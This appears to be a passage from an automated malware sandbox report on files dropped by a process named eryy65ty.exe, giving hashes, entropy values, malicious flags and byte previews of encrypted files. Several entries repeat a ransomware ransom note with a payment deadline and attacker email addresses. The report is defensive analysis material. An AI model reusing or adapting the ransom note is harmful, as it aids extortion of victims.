                                                                                                    Category:dropped
                                                                                                    Size (bytes):284
                                                                                                    Entropy (8bit):7.209353040299389
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:zx9RBPm04doCBafqYPbRsMoFIJrWB4ujFLIGuUwn:zRBPgq2YzFYurWBLwn
                                                                                                    MD5:6923B56D3E94E4753CDA67E7040FC67B
                                                                                                    SHA1:47A410D1483D9CE82A630F061B45751F86815193
                                                                                                    SHA-256:D6B7FE6130F60745A95E33150BE9A864F48EB318F769545BA3A0F53A69BE40EC
                                                                                                    SHA-512:26D1DADE51F646A6656DB88324A6507542655BD2D8ECEBBB1080B985866CFF654ACACEF2D5EA5EC70ACD543B63758733891821EE90AFC2261F668A8D4CAC9679
                                                                                                    Malicious:false
                                                                                                    Preview:.N..e.....^\..}}2^+.*.PI=7.f....N8.0........a.hc....@l...l.N._b...n{.WxM..Z.j....H..... <..N^.em...-TA..+....P.(....r..y[(.]*&_...5...0>..<..`..U....14...[..2.-.d. #...)....U.|b.0.u<(I.tS.~-@V..0@S..yw..ZU.B?...K\..........6.#C.ozt*D.z.l.....~.B........3t...\.k0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4362
                                                                                                    Entropy (8bit):7.956480722807559
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:LFfPom4rW8la5DGXaqMrLCpv5SOuNxo703McmQ2DEuqCG4:LJQpflMtwxSOC+mMcolVh
                                                                                                    MD5:4BEA384FAD324F11E1C9646E95631EDA
                                                                                                    SHA1:9B25D606EF1B75AB71021216542C89077481929E
                                                                                                    SHA-256:FEB95E45C104941546A069932CB1D1B78E99A624376890D207FFED2C53995568
                                                                                                    SHA-512:F3A0F603623F60FF91996B3B4CCD5F839FF9EFB9A82601B5503EB3E074D6D157A71BFF90C3CCA57D25DEEC02819506381212F91A077BB4623CE92A122FE7AAFA
                                                                                                    Malicious:true
                                                                                                    Preview:.J@.4.,..L..L..U*`!?Pr..#eo.[G.zb.....H.....T....@K`jo..a.H.g.Z:..P..F.+..H...j.S.#8.w."..9.Ln1.Y*. ....1..f...........#ch........y..q.+w'I.....\.+../..M.2^[....5.<...9)f.e_c.@D...By.V.s......\.lN.7;..x..V.P.~....dJ^L.[.xl[..yB...NN.F.4..)...>...s... .xam..H=o;...I.}.%.Q..I.......2.\i..K....J..d>P....(4..`...c..^*.7.A._...q6Yq.?oQ.s.s.........T/...-.W.... .>jL.(.c-.....K..#.r.GQ...:\..e.(eD'As..A.W2..P{..X.qZaI..Oq0..).b...+....i.....Z..7g....S^.2.yV........QR1..y_...A./jdI..]U/>.....l..r.'..W-]mUP.t9. ....t..+...F8....i..[...,.).hz....n..%e....-.e......].=....C.Q.......iv.Y....Le..d.m..=..{.5..`.....}gL.(.R.d.8e.L^h}..-.&.o5.}........[.h^.-..3...{+..#....0AQ.#d."<.).O..4D...$*pR....}+.....r..r..$.r...(L....b..Q.q./.\%..y.$..a..4.....o..9....H...\...o.I...S.';.*..R.`..M...fe... .vhy.|..(.2..VG?s.P/...W)...`y.........R.ht&).i....Y......T.f...},....a......_.p........ZI\..."&.......[....$.....O.]...}Y+O!.X...........^9.m0......W..v..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4362
                                                                                                    Entropy (8bit):7.956480722807559
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:LFfPom4rW8la5DGXaqMrLCpv5SOuNxo703McmQ2DEuqCG4:LJQpflMtwxSOC+mMcolVh
                                                                                                    MD5:4BEA384FAD324F11E1C9646E95631EDA
                                                                                                    SHA1:9B25D606EF1B75AB71021216542C89077481929E
                                                                                                    SHA-256:FEB95E45C104941546A069932CB1D1B78E99A624376890D207FFED2C53995568
                                                                                                    SHA-512:F3A0F603623F60FF91996B3B4CCD5F839FF9EFB9A82601B5503EB3E074D6D157A71BFF90C3CCA57D25DEEC02819506381212F91A077BB4623CE92A122FE7AAFA
                                                                                                    Malicious:false
                                                                                                    Preview:.J@.4.,..L..L..U*`!?Pr..#eo.[G.zb.....H.....T....@K`jo..a.H.g.Z:..P..F.+..H...j.S.#8.w."..9.Ln1.Y*. ....1..f...........#ch........y..q.+w'I.....\.+../..M.2^[....5.<...9)f.e_c.@D...By.V.s......\.lN.7;..x..V.P.~....dJ^L.[.xl[..yB...NN.F.4..)...>...s... .xam..H=o;...I.}.%.Q..I.......2.\i..K....J..d>P....(4..`...c..^*.7.A._...q6Yq.?oQ.s.s.........T/...-.W.... .>jL.(.c-.....K..#.r.GQ...:\..e.(eD'As..A.W2..P{..X.qZaI..Oq0..).b...+....i.....Z..7g....S^.2.yV........QR1..y_...A./jdI..]U/>.....l..r.'..W-]mUP.t9. ....t..+...F8....i..[...,.).hz....n..%e....-.e......].=....C.Q.......iv.Y....Le..d.m..=..{.5..`.....}gL.(.R.d.8e.L^h}..-.&.o5.}........[.h^.-..3...{+..#....0AQ.#d."<.).O..4D...$*pR....}+.....r..r..$.r...(L....b..Q.q./.\%..y.$..a..4.....o..9....H...\...o.I...S.';.*..R.`..M...fe... .vhy.|..(.2..VG?s.P/...W)...`y.........R.ht&).i....Y......T.f...},....a......_.p........ZI\..."&.......[....$.....O.]...}Y+O!.X...........^9.m0......W..v..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131338
                                                                                                    Entropy (8bit):0.508656591287618
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5hoA+/64ue8yKRet6scgWer7VBQgfEZZ6s+V8snO4:5uHi44y0et6sJrZeZZ6sZ4
                                                                                                    MD5:ED8A9102FE2E13FFE5C6E224143C2357
                                                                                                    SHA1:6463EB4BEDC97E7EED6BF9214F51113F26288FD2
                                                                                                    SHA-256:262E68516D3E7BE64581A906060AF3ED559E348ACC40D9645E111EE430613278
                                                                                                    SHA-512:BB739D406A7C950EEEA6A15BEE90FD521F5371CA63DD99BE04373DC9B71BCFE0D483D453F30E7FF24D6CA695594D0B46FAC268F15681F8EA354F528CECE04D7C
                                                                                                    Malicious:true
                                                                                                    Preview:.`..J:....6U]>`.X....NbZ. .u......A.m....0..U\.....z.V.:. \..oqV,Nl..\-M..sbN..l=U.i.....u.*../h.c.+.J@.J*.u.x...}..I.....Z.w.;[e.U)...L+r...n.Xk.?......P.6.Lv....7...Z...........m.....F.L..i..]..vf_.{..y]h.W......_$.i.N.rB....-E..M....>o.F.>....Uin!L....Yp@{.@....n.\$.{....7..^.{4iA.-...S&.e...U.G>.M'.bB.tz.t2.........$!..U...h.MW...!.e.j...0..v.c<tw%...D.;..;...G2._..$\B.)(........<.d8..^D..e./.....1. (s"..7..6O(.8g..J1.$X...":..c/.G..=F#=.=.........]{...>].......>....?e./..../..n5o..+.T..i.~di......o..........bK.w..d....u.p........+.n..Ys.m......YDjWC.....Qn.v...Z>.uMx.:6...l...HV.. {.`\.$.8.\...T...6t0._.+:r..=y../...q..oh.H...'et%E.B.^..t@7h.n@..../Q{0D...x..a...(P...G.......$A....).y...q2W~..y.U.g..;.U.....-.f.g.uW.:{.'.F..<?..Ly..J.=..k....f.~.....vxF.".^A7~........:..b?#..{...$.l.M..B...)..K..R.Q..yaKVf...l...AO.X;...d.hx..lA.....H=..F.)J.f+...S.52...b&.uD.'`.g..j[...5m...#(.C.).k..n..%....}........xb.l&..."=0W..z.U7.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131338
                                                                                                    Entropy (8bit):0.508656591287618
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5hoA+/64ue8yKRet6scgWer7VBQgfEZZ6s+V8snO4:5uHi44y0et6sJrZeZZ6sZ4
                                                                                                    MD5:ED8A9102FE2E13FFE5C6E224143C2357
                                                                                                    SHA1:6463EB4BEDC97E7EED6BF9214F51113F26288FD2
                                                                                                    SHA-256:262E68516D3E7BE64581A906060AF3ED559E348ACC40D9645E111EE430613278
                                                                                                    SHA-512:BB739D406A7C950EEEA6A15BEE90FD521F5371CA63DD99BE04373DC9B71BCFE0D483D453F30E7FF24D6CA695594D0B46FAC268F15681F8EA354F528CECE04D7C
                                                                                                    Malicious:false
                                                                                                    Preview:.`..J:....6U]>`.X....NbZ. .u......A.m....0..U\.....z.V.:. \..oqV,Nl..\-M..sbN..l=U.i.....u.*../h.c.+.J@.J*.u.x...}..I.....Z.w.;[e.U)...L+r...n.Xk.?......P.6.Lv....7...Z...........m.....F.L..i..]..vf_.{..y]h.W......_$.i.N.rB....-E..M....>o.F.>....Uin!L....Yp@{.@....n.\$.{....7..^.{4iA.-...S&.e...U.G>.M'.bB.tz.t2.........$!..U...h.MW...!.e.j...0..v.c<tw%...D.;..;...G2._..$\B.)(........<.d8..^D..e./.....1. (s"..7..6O(.8g..J1.$X...":..c/.G..=F#=.=.........]{...>].......>....?e./..../..n5o..+.T..i.~di......o..........bK.w..d....u.p........+.n..Ys.m......YDjWC.....Qn.v...Z>.uMx.:6...l...HV.. {.`\.$.8.\...T...6t0._.+:r..=y../...q..oh.H...'et%E.B.^..t@7h.n@..../Q{0D...x..a...(P...G.......$A....).y...q2W~..y.U.g..;.U.....-.f.g.uW.:{.'.F..<?..Ly..J.=..k....f.~.....vxF.".^A7~........:..b?#..{...$.l.M..B...)..K..R.Q..yaKVf...l...AO.X;...d.hx..lA.....H=..F.)J.f+...S.52...b&.uD.'`.g..j[...5m...#(.C.).k..n..%....}........xb.l&..."=0W..z.U7.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):302
                                                                                                    Entropy (8bit):7.237771183122865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:agLsjwpuRg9/QxZHhQXO8Co2RrO7EU1KNz/+bGwBuRFkfjqGHe2n:dpuRg9/QjHhEV2RrO4cKhGbGzkfeQe2n
                                                                                                    MD5:A16F0677F7DBA977FEDAB734E6C38C23
                                                                                                    SHA1:9DEAAC31DDF26AB265BD177528A67F97CF2BA745
                                                                                                    SHA-256:0A6DE8CC1ADE73519B98070F4003B374F8CF21C14EF57F9A164147F483A15BBA
                                                                                                    SHA-512:1E9606B7F8BDD3A9E143F23BA9B46F183A6D950053BFF50B7265352A0BDD2C78874148D9A9D6FAA5131BD0CE7DC2A19D393F3EFE3416B09BFE3CF26BFE504DAD
                                                                                                    Malicious:true
                                                                                                    Preview:.62.\n....s~...........r.... r..ome..i.[6..9_$y.&.t..|s.?......./T...F..-d!h.[c...D.zk.r.%...|..4.%V.....7$'~...h..LV.H...+|....:..>.... RR....o..Mh.i.~.[.KBR.#.V9..........e.......mL.D..H.6.X..9..CX.U.$...c.jY._v.......3..M9.kM)1...f!..\6.f.....$w......t.U).>.n^mz .. .}.%...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):302
                                                                                                    Entropy (8bit):7.237771183122865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:agLsjwpuRg9/QxZHhQXO8Co2RrO7EU1KNz/+bGwBuRFkfjqGHe2n:dpuRg9/QjHhEV2RrO4cKhGbGzkfeQe2n
                                                                                                    MD5:A16F0677F7DBA977FEDAB734E6C38C23
                                                                                                    SHA1:9DEAAC31DDF26AB265BD177528A67F97CF2BA745
                                                                                                    SHA-256:0A6DE8CC1ADE73519B98070F4003B374F8CF21C14EF57F9A164147F483A15BBA
                                                                                                    SHA-512:1E9606B7F8BDD3A9E143F23BA9B46F183A6D950053BFF50B7265352A0BDD2C78874148D9A9D6FAA5131BD0CE7DC2A19D393F3EFE3416B09BFE3CF26BFE504DAD
                                                                                                    Malicious:false
                                                                                                    Preview:.62.\n....s~...........r.... r..ome..i.[6..9_$y.&.t..|s.?......./T...F..-d!h.[c...D.zk.r.%...|..4.%V.....7$'~...h..LV.H...+|....:..>.... RR....o..Mh.i.~.[.KBR.#.V9..........e.......mL.D..H.6.X..9..CX.U.$...c.jY._v.......3..M9.kM)1...f!..\6.f.....$w......t.U).>.n^mz .. .}.%...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1554299074783658
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+rglCeDO/vMDYZ4kapWOWrHjlhhR5D7zOh95aT6HJsh3j1:+UlrDOHMDC4kZlx5DfK9HHJs1h
                                                                                                    MD5:3F879A18BC02691CC1E5354222D616D1
                                                                                                    SHA1:51A43EDF6B6595652136B9578BD48EDCA9FA8C8E
                                                                                                    SHA-256:B7008DA2FF703763120911A3F64E437580E04C6AB63A61EA78AF3A9BB9BA5EE3
                                                                                                    SHA-512:40698A530D16BBF0BDD15AAF891170C4786D593C29557CE1CB94ED6C7DC2935066473785315770886EB3F36C8340B650A8619B26C742BD696F90BD1D22732A20
                                                                                                    Malicious:true
                                                                                                    Preview:..0.W.".G.E..Pk3.@,..d:[..'.m\..@W....6J.tMk.]........_....B.Jk..>..pNXcc.....{ .Kr.]...J.........Z+.)..h.4..V<.YT..m.i.2.....Dx...... .....KzL.mY`B.E4..YKhe2..m.@,.....{....E6..f.2.6_...I...py.Yb.M._...D..e.9l'.H...h.pX.f...e!.{..[._y.}D.)N..|0_i...4-..@Zt.f...S_..Lw.L..F.9r.8db....3n.\V.%..~#.XM.8|.Z.{..o...tPlH.g4.D.\..",.......}.k<......J..8.........b.$S..yr..7........O.NE............i.......Lg.-HJy...........p....8......R.3...F...K.-.9..H........kj...K.9..<'...R..d.O.......+Fx.Sw..;......9.2H:....e.*_.........*t...9h.....Is...1.......6.V....+...=.N..c.u...l..A}.F.d....H....Nw.QI..,.<.urdu...$Jw.J."nf..R.d.].....(?<......c..|.wzP...y?J...N~......O.^......i.z.'.,!...C.[(s.p.X...C.W..=..Ij....k...u_E.x;RF.G.f<....ID.."g..H.&%..4.BQ...&t.B6o.C..n..B.A.....2..%....^..K....i~].;.W....."!.....2..C..DG._.&.q.w.Yb......=&.*...+U....$x._[rp...A..U.^....X-.6.b.a.H..^>....[.p..'.tbx...6x..m.....;.!.d.D.`.U..L.8>.G....T....R.....z.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6054947345742925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Rz9wSlq1EcrLCEDSAIR57GH0dfHz0o/UOjfsvYh0jKk:hauID3IR5SHYzWOwvYh0b
                                                                                                    MD5:B944A0D69CD29BC5FEF8138EEF9EF5B5
                                                                                                    SHA1:0E45C3E36B2C12DB13A5F4113CD57B78C8D696F6
                                                                                                    SHA-256:C72F8C936C44E4F330BAD8775EE325CEEE388EEF9F31A15383B0A97CA90B442B
                                                                                                    SHA-512:DCA780F3E1A064AAEE6A51B79637441519BDE60CAD839E8CBC427B525D4EE404CA18A97523C538974B4DD340CB7B2C9655CAD1F1446CBFE064DCEEDCE06E4F99
                                                                                                    Malicious:true
                                                                                                    Preview:I...0...R-u.].....zj...N..G..%.D.aLj.w.5.(w..e,........Bc..o..!...!...t/..Z..}$dT...$u.......$..`..Rv.RW....Y....@.......NE.v..D.....H.....z...{w..u.../...]B.6.8.H..;7V..p..Ggy...U.E.....lX%.E....1...&Xm..z...........g. .+b.n...N..u..)..@..a...t.Q.........].:.[;+.7W..i).../..L.lJ!#w.M.(..0.l...u<.K...(..6.r.....J..uz....%{%.g...R.c...F@.e`O...M.V........8........H.`..h..k..............6>.Ae.Q...l.M."..2.K.e.....N....oo.G.H.w(....e{w..].s=|.TCc.2.....P.........S..P.5...D.v&.......@?.....q...0.........n.....[.d./.Xe...D.Q......PEL......C...l.&+.......q{^...^]`.L....4x.....;x.y..t..0......7:...Oi...o.x.yf..wl..j.5%...........I..iF.{x.!...U.\...t...H.A..i..E.9$.".Sx`...2.....h;J5.I..!....+..L...o-.....W..6eC.#-...........s..}..lh.J.*V..6..+.....r0...JM.......R...HO.5..Q.I.<..g5I.I}?".[...t.......5-.s..#..|.8.s.m'2.+.P<ha.....+.j;..F.T.N.Gz...v@;v;..2...~.-..'...%..&i./7...'|. .......V"i...:....|..&..D..q7.vV...).,[j[#...E>..[D._!@....m..z.........
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33034
                                                                                                    Entropy (8bit):1.6054947345742925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Rz9wSlq1EcrLCEDSAIR57GH0dfHz0o/UOjfsvYh0jKk:hauID3IR5SHYzWOwvYh0b
                                                                                                    MD5:B944A0D69CD29BC5FEF8138EEF9EF5B5
                                                                                                    SHA1:0E45C3E36B2C12DB13A5F4113CD57B78C8D696F6
                                                                                                    SHA-256:C72F8C936C44E4F330BAD8775EE325CEEE388EEF9F31A15383B0A97CA90B442B
                                                                                                    SHA-512:DCA780F3E1A064AAEE6A51B79637441519BDE60CAD839E8CBC427B525D4EE404CA18A97523C538974B4DD340CB7B2C9655CAD1F1446CBFE064DCEEDCE06E4F99
                                                                                                    Malicious:false
                                                                                                    Preview:I...0...R-u.].....zj...N..G..%.D.aLj.w.5.(w..e,........Bc..o..!...!...t/..Z..}$dT...$u.......$..`..Rv.RW....Y....@.......NE.v..D.....H.....z...{w..u.../...]B.6.8.H..;7V..p..Ggy...U.E.....lX%.E....1...&Xm..z...........g. .+b.n...N..u..)..@..a...t.Q.........].:.[;+.7W..i).../..L.lJ!#w.M.(..0.l...u<.K...(..6.r.....J..uz....%{%.g...R.c...F@.e`O...M.V........8........H.`..h..k..............6>.Ae.Q...l.M."..2.K.e.....N....oo.G.H.w(....e{w..].s=|.TCc.2.....P.........S..P.5...D.v&.......@?.....q...0.........n.....[.d./.Xe...D.Q......PEL......C...l.&+.......q{^...^]`.L....4x.....;x.y..t..0......7:...Oi...o.x.yf..wl..j.5%...........I..iF.{x.!...U.\...t...H.A..i..E.9$.".Sx`...2.....h;J5.I..!....+..L...o-.....W..6eC.#-...........s..}..lh.J.*V..6..+.....r0...JM.......R...HO.5..Q.I.<..g5I.I}?".[...t.......5-.s..#..|.8.s.m'2.+.P<ha.....+.j;..F.T.N.Gz...v@;v;..2...~.-..'...%..&i./7...'|. .......V"i...:....|..&..D..q7.vV...).,[j[#...E>..[D._!@....m..z.........
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.181705453410326
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:MiA5TZ5dtlo2x6oq+rg9XBVne1Bz0CEpModJyp5isIjR5fa/jB/Ejkuon:MicTZvtljxXHrg1BA1Bwp5vsABa/jtE+
                                                                                                    MD5:173FBFA74F9F53042F12A680011429C9
                                                                                                    SHA1:3420C7D70AF04E275EE8D6772A9F51546D096586
                                                                                                    SHA-256:83082328984D09AD10ED0AABE709F9CBC2EDF1AA73A46382DAABDE03C9C13B57
                                                                                                    SHA-512:DF60D522CF1ADCA1334C79D71A1413751D3E1BF4E23B2EF2C8738F90523568199EE95E480AF21E9D7B399BF10B3B1C8ADE468CDB896393262595495E411C7E00
                                                                                                    Malicious:true
                                                                                                    Preview:..b.e...}L.|.. ..........xtD....Sq.d....>..H?..$S..ce ..y....=$....s..B....r.0k....m.)..."a$...X...<(..L.5....@.4y....GYE..Q=.\...Vh`..:..p5...V.7.l..Z...D..P.7.H.....=~...#Q..:..A.....M...U.?.5M....4g#/1b..1...k.M5...ZN.....?/..r...t....]..8...D.TyppL..JW......0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49418
                                                                                                    Entropy (8bit):1.1554299074783658
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+rglCeDO/vMDYZ4kapWOWrHjlhhR5D7zOh95aT6HJsh3j1:+UlrDOHMDC4kZlx5DfK9HHJs1h
                                                                                                    MD5:3F879A18BC02691CC1E5354222D616D1
                                                                                                    SHA1:51A43EDF6B6595652136B9578BD48EDCA9FA8C8E
                                                                                                    SHA-256:B7008DA2FF703763120911A3F64E437580E04C6AB63A61EA78AF3A9BB9BA5EE3
                                                                                                    SHA-512:40698A530D16BBF0BDD15AAF891170C4786D593C29557CE1CB94ED6C7DC2935066473785315770886EB3F36C8340B650A8619B26C742BD696F90BD1D22732A20
                                                                                                    Malicious:false
                                                                                                    Preview:..0.W.".G.E..Pk3.@,..d:[..'.m\..@W....6J.tMk.]........_....B.Jk..>..pNXcc.....{ .Kr.]...J.........Z+.)..h.4..V<.YT..m.i.2.....Dx...... .....KzL.mY`B.E4..YKhe2..m.@,.....{....E6..f.2.6_...I...py.Yb.M._...D..e.9l'.H...h.pX.f...e!.{..[._y.}D.)N..|0_i...4-..@Zt.f...S_..Lw.L..F.9r.8db....3n.\V.%..~#.XM.8|.Z.{..o...tPlH.g4.D.\..",.......}.k<......J..8.........b.$S..yr..7........O.NE............i.......Lg.-HJy...........p....8......R.3...F...K.-.9..H........kj...K.9..<'...R..d.O.......+Fx.Sw..;......9.2H:....e.*_.........*t...9h.....Is...1.......6.V....+...=.N..c.u...l..A}.F.d....H....Nw.QI..,.<.urdu...$Jw.J."nf..R.d.].....(?<......c..|.wzP...y?J...N~......O.^......i.z.'.,!...C.[(s.p.X...C.W..=..Ij....k...u_E.x;RF.G.f<....ID.."g..H.&%..4.BQ...&t.B6o.C..n..B.A.....2..%....^..K....i~].;.W....."!.....2..C..DG._.&.q.w.Yb......=&.*...+U....$x._[rp...A..U.^....X-.6.b.a.H..^>....[.p..'.tbx...6x..m.....;.!.d.D.`.U..L.8>.G....T....R.....z.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
